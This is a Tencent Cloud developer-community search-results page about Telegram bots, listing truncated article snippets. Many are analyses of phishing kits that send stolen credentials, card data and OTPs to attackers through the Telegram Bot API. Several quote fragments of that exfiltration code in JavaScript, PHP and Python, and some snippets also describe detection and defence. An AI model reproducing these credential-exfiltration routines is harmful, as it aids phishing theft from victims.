Telegram bot:同一域名上具有不同路由的多个bot - 腾讯云开发者社区

文章/答案/技术大牛

发布

同一域名下，不同的URL的路径转发到不同服务上

这种配置常用于一个网站通过不同的路径提供不同服务的场景。...通过如下的访问配置：对 http://my.nginx.test/hello-k8s 的访问将被路由到后端名为"hello-k8s-svc" 的Service。...对 http://my.nginx.test/hello-world 的访问将被路由到后端名为"hello-world-svc" 的Service。...HOSTS ADDRESS PORTS AGE nginx-test my.nginx.test 80 15s 备注：这里我们将自有域名...在浏览器的访问验证如下：

4.5K3 0

一封“域名续费”邮件，竟让WordPress站长银行卡被掏空——新型钓鱼攻击借Telegram实时收割支付信息

近日，独立安全研究员Anurag Gawande在SC Media上披露了一项针对WordPress管理员的新型钓鱼活动，其核心手法正是利用“域名续费”这一高频、刚需场景，结合高度仿真的支付界面与Telegram...Please try again.");});第四阶段：Telegram作为“零基础设施”数据管道与传统钓鱼攻击需自建C2服务器不同，本次攻击的创新点在于完全依赖Telegram Bot作为数据接收端。...攻击者在后端使用Python或Node.js脚本，将收集到的数据通过Telegram Bot API实时推送至私有频道：# 攻击者服务器后端（Python + python-telegram-bot）import...、礼品卡）平台批量下单；利用同一手机号尝试“找回密码”功能，劫持用户的WordPress后台、邮箱甚至社交媒体账号。...部分团伙已开发出集成Telegram Bot + 自动化购物流程的“钓鱼即服务”（Phishing-as-a-Service）工具包，在暗网以月租形式出售。

2231 0

您找到你想要的搜索结果了吗？

是的

没有找到

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

此类攻击绕过了传统基于域名黑名单、C2通信特征或邮件内容分析的检测体系。...2025年8月，多家网络安全机构披露，多个APT关联团伙及金融犯罪组织已将Telegram作为核心基础设施，用于钓鱼分发、实时指挥与敏感数据回传。...与传统依赖自建C2服务器或僵尸网络的模式不同，此类攻击完全依托Telegram的合法服务链——包括Bot API、公开频道、私有群组及内嵌WebView——构建隐蔽且高效的攻击管道。...此类攻击的核心挑战在于其“合法性掩护”：所有通信均经由telegram.org域名完成，符合SPF/DKIM/DMARC标准；Bot API调用使用HTTPS加密；消息支持自毁与私聊加密，极大增加取证难度...防御的关键在于“上下文感知”：同一api.telegram.org请求，在普通用户聊天中属正常，在财务人员终端上伴随密码字段输入则高度可疑。因此，安全架构必须融合身份、设备、行为与内容四维上下文。

4701 0

基于Telegram外传的WordPress域名续费钓鱼攻击分析与防御机制

此类攻击不仅利用了管理员对域名管理时效性的焦虑心理，还借助Telegram平台的端到端加密通信和低部署成本，显著提升了隐蔽性与成功率。...3D Secure验证流程，诱骗用户多次输入短信验证码（OTP），并将所有数据通过Telegram Bot实时外传。...(2.4) 数据外传：Telegram作为隐蔽通道所有窃取的数据通过前端JavaScript实时发送至攻击者控制的Telegram Bot。...(3.3) Telegram外传的隐蔽优势相较于自建HTTP C2服务器，使用Telegram具有三大优势：低成本：无需购买域名、VPS或配置SSL；高可用：Telegram全球节点稳定，不易被封禁；低检测率...建议组织采取以下措施：强制使用书签或手动输入：要求所有域名续费操作必须通过预先保存的官方书签或手动输入官网地址完成；启用自动续费：在域名注册商后台开启自动扣款，从根本上消除人工续费需求；分离财务权限：将域名管理权限与支付权限分配给不同人员

1211 0

OpenClaw 多 Agent 架构与 Telegram 机器人全链路接入指南

折腾了一天，终于完成了+OpenClaw+部署的一个重要里程碑：从单体+Agent+进化到了由多个+Agent+独立工作区和专属+Telegram+机器人组成的“专家团”架构。...+路由绑定+(Routing+Bindings) 通过绑定将特定的+Telegram+账号流量直接导向对应的+Agent+工作区： # 将机器人账户与 Agent 实例绑定 openclaw agents...策略分配：为专家选择“最强大脑” 不同的+Agent+职责对应不同的模型特质。...MiniMax-M2.5+➔+博客写作：利用其在中文语境下卓越的叙事逻辑和长文本润色能力。 Qwen+3.5+27B➔+系统运维：取其在+Linux+指令执行上的高稳定性。...当你在群里同时+@+多个机器人时，不同的+Emoji+能帮你快速分辨回复来源。 3.

2K2 0

如何使用WhoAmIMailBot隐藏你的电子邮箱地址

工作机制为了实现我们的目标，我们需要准备好下列内容： 1、一个域名（如果想省钱的话，也可以使用no-ip 服务）； 2、一台允许SMTP出站流量的VPS； 3、一个Telegram Bot ID；...此时，我们可以设置一个电子邮件地址，并将所有传入的邮件重定向到另一个电子邮箱。如果使用了no-ip域名的话，我们可以使用Telegram Bot来管理电子邮箱别名。...下图显示的是该工具的运行机制流程图：工具安装源码安装由于该工具基于Python开发，因此我们首先需要在本地设备上安装并配置好Python环境。...：Telegram Bot令牌； TELEGRAM_USER_ID：你的Telegram ID； FAKE_DOMAIN：用于接收电子邮件的虚假域名（例如mailbot.ddns.net）；工具使用... 工具配置完成后，我们就可以在Telegram Bot上执行下列命令了：命令描述 /list 查看所有可用的别名 /new mail@mail.com 针对给定电子邮件地址创建一个新的别名 /delete

1.4K2 0

面向意大利主机托管客户的定向钓鱼攻击机制与防御策略研究

文中提供可部署的自动化检测脚本示例，包括相似域名生成与监控、邮件URL跳转链解析、Telegram Bot通信特征提取等关键技术实现。...关键词：定向钓鱼；网络托管；社会工程；品牌仿冒；多因素认证；域名安全；Telegram Bot；SSL证书滥用1 引言网络托管服务作为现代数字基础设施的核心组成部分，承载着数百万中小企业、政府机构及个人网站的运行...其业务模式具有明显的周期性特征——用户需定期续费以维持域名注册、服务器资源及邮箱服务。一旦账户因“欠费”或“验证异常”被暂停，将直接导致业务中断，这种强时效压力为攻击者提供了天然的社会工程杠杆。...Dashboard其中，Telegram Bot成为核心枢纽。...攻击者创建多个Bot，每个对应一个钓鱼活动，通过/getUpdates轮询或Webhook接收消息。

2411 0

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

Telegram Bot API的开放性为此类攻击提供了技术基础。任何开发者均可注册Bot并获取唯一token，通过简单HTTP请求实现消息收发。...2.1 前端钓鱼页面钓鱼页面通常托管于短期域名或被入侵网站，模仿Microsoft 365、Revolut、Instagram等登录界面。...4.3 SOC行为检测规则攻击者操作Bot时呈现明显行为特征：单一Telegram账户在短时间内发送多条/verify命令；登录IP跨越多个自治系统（AS），如从AS8402（俄罗斯）跳至AS3269（...技术上，该模式依赖轻量级HTTP回调与开放通信平台，具备高弹性与低部署成本；防御上，传统边界防护已显不足，需深入至身份上下文与行为时序层面。...唯有将通信平台纳入安全监控范畴，并推动无密码认证普及，方能从根本上削弱此类人机协同钓鱼的生存土壤。编辑：芦笛（公共互联网反网络钓鱼工作组）

3211 0

钓鱼攻击中窃取数据的流转路径与防御机制研究

2.2 Telegram Bot 成为主流回传通道当前绝大多数钓鱼页面嵌入Telegram Bot API实现即时数据推送。...攻击者首先在Telegram上创建Bot并获取token，随后在钓鱼脚本中调用Telegram的sendMessage接口。...chat_id=${chatId}&text=${message}`;await fetch(url);}该方案优势显著：Telegram服务器分布全球，抗封锁能力强；Bot通信无需暴露真实IP；消息可自动转发至多个频道或私人群组...这些平台提供可视化后台，允许租用者部署多个钓鱼模板、绑定域名、配置回传规则，并自动聚合所有捕获数据。...例如，通过DNS sinkholing将钓鱼域名解析至蜜罐服务器，捕获回传请求；或向Telegram Bot发送伪造凭证，污染攻击者数据库。此类主动防御虽不能阻止初始钓鱼，但可降低其运营效率。

2141 0

面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

Webmail登录页面窃取用户凭证，并利用Telegram Bot实现自动化数据回传。...因此，针对此类地域化钓鱼威胁的深入分析，对构建有效的纵深防御体系具有现实意义。本文聚焦于该新型钓鱼工具包的技术架构、传播机制与社会工程策略，结合实际样本逆向分析，揭示其自动化运作流程与规避检测手段。...在此基础上，提出一套融合技术检测、用户教育与策略响应的多层防御框架，并通过代码示例验证关键检测逻辑的有效性。...更关键的是，Telegram Bot作为数据回传通道，具有高隐蔽性与实时性：// telegram.phpfunction send_to_telegram($user, $pass, $ip) {$bot_token...在此基础上，提出了融合客户端检测、网络监控与用户教育的多层防御方案，并通过代码示例验证了核心逻辑的可行性。

2571 0

基于双重扩展名伪装与即时通讯C2的钓鱼攻击机理研究

尤为关键的是，攻击者摒弃了传统的自建命令与控制（C2）服务器，转而利用Telegram Bot API作为数据回传通道，有效规避了基于域名信誉和流量特征的常规检测机制。...采购部门每日需处理大量来自不同供应商的订单询价，对带有“PO”、“Invoice”、“Quotation”等关键词的邮件具有天然的信任倾向。...4 基于Telegram Bot的隐蔽C2通信架构本案例最显著的技术特征在于其命令与控制（C2）通道的选择。攻击者未使用传统的PHP后端或云存储桶，而是利用了Telegram Bot API。...许多企业并未将Telegram的域名（如api.telegram.org）列入黑名单，因为其可能被用于正常的业务沟通或员工个人使用。.../blurry_invoice.png";}这一步骤具有双重作用：一是为用户提供“成功查看文档”的假象，进一步麻痹用户；二是利用合法的高信誉域名（ibb.co）作为最终落地页，避免触发基于URL信誉的浏览器警告

2371 0

精准围猎：新型钓鱼工具包专攻意大利，本地化伪装成网络犯罪新范式

Telegram Bot 自动化回传传统钓鱼工具包依赖邮件或 FTP 回传凭据，易被拦截。...而此工具包直接集成 Telegram Bot API，实现秒级通知：import requestsdef send_to_telegram(username, password, ip):bot_token...他们研究目标国的语言、行政流程、常用服务品牌乃至节假日习俗，将社会工程学做到极致。四、国内启示：中国数字身份体系面临相似风险对中国而言，意大利 SPID 钓鱼事件具有强烈的预警意义。...这些系统普遍采用手机号+人脸识别+短信验证码的多因子认证，理论上安全性较高。但若攻击者结合本地化钓鱼，风险依然存在。...技术策略包括：域名监控：利用 WHOIS 和 DNS 被动解析数据，监控新注册的含 “spid”、“agenziaentrate”、“posteitaliane” 等关键词的域名；Telegram Bot

1421 0

BotSharp：又一个.Net重磅AI开源项目，.Net在AI领域开始崛起！

下面介绍一个开源项目，面向AI Bot平台构建者的开源机器学习框架：BotSharp，它已经为.NET开发人员提供了使用BotSharp AI BOT platform Builder构建CaaP的整套工具包...因此，您可以选择不同的UI/UX，或选择不同的LLM提供商。它们都是基于统一接口进行模块化的。...协同工作：允许多个具有不同职责的代理协同工作，以完成复杂的任务。一站式开发：在同一个平台上构建、测试、评估和审计你的 LLM 代理。...内容集成：抽象化的标准富内容数据结构，可以与 Facebook Messenger、Slack 和 Telegram 等流行的消息渠道集成。...2.4 代理列表 2.5 会话列表 04 技术优势跨平台：使用 C# 编写，运行在 .NET Core 上，支持跨平台部署。

7630 0

ginx反向代理多个域名指向同一个ip的不同网站的方法

一个服务器需要挂载多个项目【重点是都能通过域名访问】　　实现原理：　　1.当前市面上看到的一些服务器，开放的端口一般都要求为 '80' 端口所以80端口成了商用端口　　2.域名的绑定是绑定一个一般是绑定你的服务器...ip地址　　3.使用服务器的80端口拦截访问的域名是什么跳转至服务器的其他　　举例　　只有一台服务器，一个IP；　　服务器上有多个应用运行在不同的端口。...例如：　　127.0.0.1:4000 运行着一个博客应用　　127.0.0.1:3009 运行着一个微信公众号机器人的后台希望不同的域名，都解析到该IP的80端口，但是转发到不同的端口去：　　www.baidu.com...在Nginx的conf中添加二级域名主机头80端口的侦听　　PS：本例中，要新添加的解析二级域Ai.baidu.com 　　端口号为80 　　server_name 精确匹配到二级域名（本例中为Ai.baidu.com...其他规则或www也可以，只要与域名商处解析行为一致即可）　　再给conf添加如下1个server：　　server { listen

7K0 0

我用 Opencode 做了一个 FakeClawBot

在地铁上、在咖啡厅里、在床上刷手机的时候，随手给它丢一段代码让它帮我分析？然后我发现了 OpenCode 的一个关键能力——Server 模式。什么是 OpenCode？...Web 页面、手机 App、Discord Bot、Telegram Bot……只要能发 HTTP 请求，就能用上 AI 编程的全部能力。...踩过的坑这个项目虽然简单，但在实际搭建和使用过程中还是踩了一些值得分享的坑：坑一：模型名称包含多个斜杠 OpenCode 的模型格式是 provider/modelID，比如 quotio/gemini...Bot 的"单例监听"限制一个 Telegram Bot Token 在同一时间只能有一个进程在监听消息（getUpdates 或 Webhook）。...，用同一个 Bot Token 推送给自己，完全不冲突接入更多平台：同样的 opencode_client.py，换一个前端就能做成 Discord Bot、Slack Bot、微信机器人…… 团队协作

1.2K1 0

基于“Smishing Triad”事件的短信钓鱼攻击机制与防御体系研究

为此，本文提出融合品牌保护、通信内容策略、终端行为分析与自动化威胁情报响应的纵深防御框架，并提供可部署的代码示例，包括相似域名生成监控、短信关键词正则匹配、Telegram Bot通信特征提取及移动钱包异常绑定检测逻辑...关键词：短信钓鱼；Smishing Triad；Lighthouse；钓鱼即服务；移动支付；Telegram Bot；品牌仿冒；SSL证书滥用1 引言随着移动支付在全球范围内的普及，攻击者正将焦点从传统网络钓鱼...（2）Lighthouse平台在技术上如何规避检测并提升欺骗性？（3）现有安全机制为何难以应对高频轮换的钓鱼基础设施？（4）应如何构建兼顾实时性与准确性的防御体系？...攻击者精准复刻这些元素，使短信在视觉与语义上难以区分真伪。...[.]com）；C2通信隐蔽化：数据通过HTTPS POST至中间脚本，再由Python脚本推送至Telegram Bot。

2901 0

使用n8n搭建服务器监控系统：从Webhook到Telegram告警的完整实现

Bot（用于接收告警消息）支持HTTPS的域名（用于Webhook接收）配置信息获取：n8n域名：替换your-n8n-domain.com为你的n8n实际部署域名认证Token：使用openssl...rand -hex 32命令生成强随机字符串Telegram Chat ID：与Bot对话后访问 https://api.telegram.org/botBOT_TOKEN>/getUpdates...发送告警到Telegram当检测到告警时，通过Telegram Bot发送通知消息：执行以下命令进行安装/配置：从配置可以看到，Telegram节点的关键设置：Resource: MessageOperation...服务器端监控脚本在被监控的服务器上，需要部署数据采集脚本，定期收集系统指标并推送到n8n：#!...A: 在每台服务器上部署监控脚本，设置不同的SERVER_NAME，所有服务器向同一个Webhook地址推送数据。系统会根据server_name字段区分不同服务器。Q: 如何避免告警消息过多？

2.4K10 0

钓鱼团伙用Telegram机器人“接单”：欧洲凭证窃取进入“实时客服”时代

一切看似正常——直到三天后，他发现账户中 €47,000 被分批转入多个加密钱包。...操作员随即通过同一机器人发送指令，触发二次验证流程，并诱导受害者在后续弹出的“安全确认”页面中输入短信验证码。整个过程耗时不到90秒，且全程由机器人协调完成，无需人工值守。这并非孤例。...更危险的是，这些机器人常被嵌入暗网市场作为“增值服务”出售。例如，在某俄语论坛上，一套包含“钓鱼页面+Telegram回传+2FA诱导”功能的完整套件售价仅 $150/月，支持无限次部署。...尽管当前Telegram钓鱼主要集中在欧洲，但其模式对中国具有强烈警示意义。首先，国内大量企业员工习惯通过微信、钉钉接收工作通知，而这些平台同样支持小程序、H5页面跳转。...；重点监控“短时高频”行为：例如，某用户在登录后5分钟内访问多个敏感系统，且源IP跨越不同自治系统（AS）；部署欺骗技术（Deception）：在内网部署蜜罐邮箱，一旦其凭证被用于登录外部服务，立即触发高危告警

3221 0

Clawdbot — 开源的新一代个人 AI 助手

Clawdbot 是一款运行在你自己设备上的个人 AI 助手。...它可以在你已经使用的通讯渠道中与你对话，包括：WhatsApp ，Telegram ，Slack ，Discord ，Google Chat ，Signal ， iMessage ，Microsoft...•多代理路由[13] — 将入站的通道/账户/对等设备路由到隔离的代理（工作区 + 每个代理的会话）。...•语音唤醒[14] + 对话模式[15] — 在 macOS/iOS/Android 上提供始终开启的语音支持（与 ElevenLabs 配合）。.../docs.clawd.bot/channels [13]多代理路由:https://docs.clawd.bot/gateway/configuration [14]语音唤醒:https://docs.clawd.bot

5841 0

卸载龙虾，把本地AI编程助手 Claude Code、Gemini、Codex 通通装进飞书和企业微信

权限模式，Codex 常用 suggest，Claude Code 常用 default 平台凭证：Telegram 用 token，飞书用 app_id/app_secret，企业微信按模式不同填写...先给结论：当前版本的 cc-connect，没有一个通用的运行时命令，让你在同一个 project 里把 codex 直接热切换成 gemini。...你不用配公网 IP，不用域名，不用反向代理，只要去 @BotFather 创建一个 bot，拿到 token，填到配置里就能跑。...BotFather 这边你主要做三件事：发送 /newbot 取一个 bot 名字和用户名拿到 token 如果你想把权限收紧，再额外做一件事：去 @userinfobot 查自己的 Telegram...我的建议很简单：先快跑，再扩展。先用 WebSocket 版本验证价值，后面再决定要不要上 Webhook。

4231 0

点击加载更多

同一域名下，不同的URL的路径转发到不同服务上

一封“域名续费”邮件，竟让WordPress站长银行卡被掏空——新型钓鱼攻击借Telegram实时收割支付信息

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

基于Telegram外传的WordPress域名续费钓鱼攻击分析与防御机制

OpenClaw 多 Agent 架构与 Telegram 机器人全链路接入指南

如何使用WhoAmIMailBot隐藏你的电子邮箱地址

面向意大利主机托管客户的定向钓鱼攻击机制与防御策略研究

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

钓鱼攻击中窃取数据的流转路径与防御机制研究

面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

基于双重扩展名伪装与即时通讯C2的钓鱼攻击机理研究

精准围猎：新型钓鱼工具包专攻意大利，本地化伪装成网络犯罪新范式

BotSharp：又一个.Net重磅AI开源项目，.Net在AI领域开始崛起！

ginx反向代理多个域名指向同一个ip的不同网站的方法

我用 Opencode 做了一个 FakeClawBot

基于“Smishing Triad”事件的短信钓鱼攻击机制与防御体系研究

使用n8n搭建服务器监控系统：从Webhook到Telegram告警的完整实现

钓鱼团伙用Telegram机器人“接单”：欧洲凭证窃取进入“实时客服”时代

Clawdbot — 开源的新一代个人 AI 助手

卸载龙虾，把本地AI编程助手 Claude Code、Gemini、Codex 通通装进飞书和企业微信

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐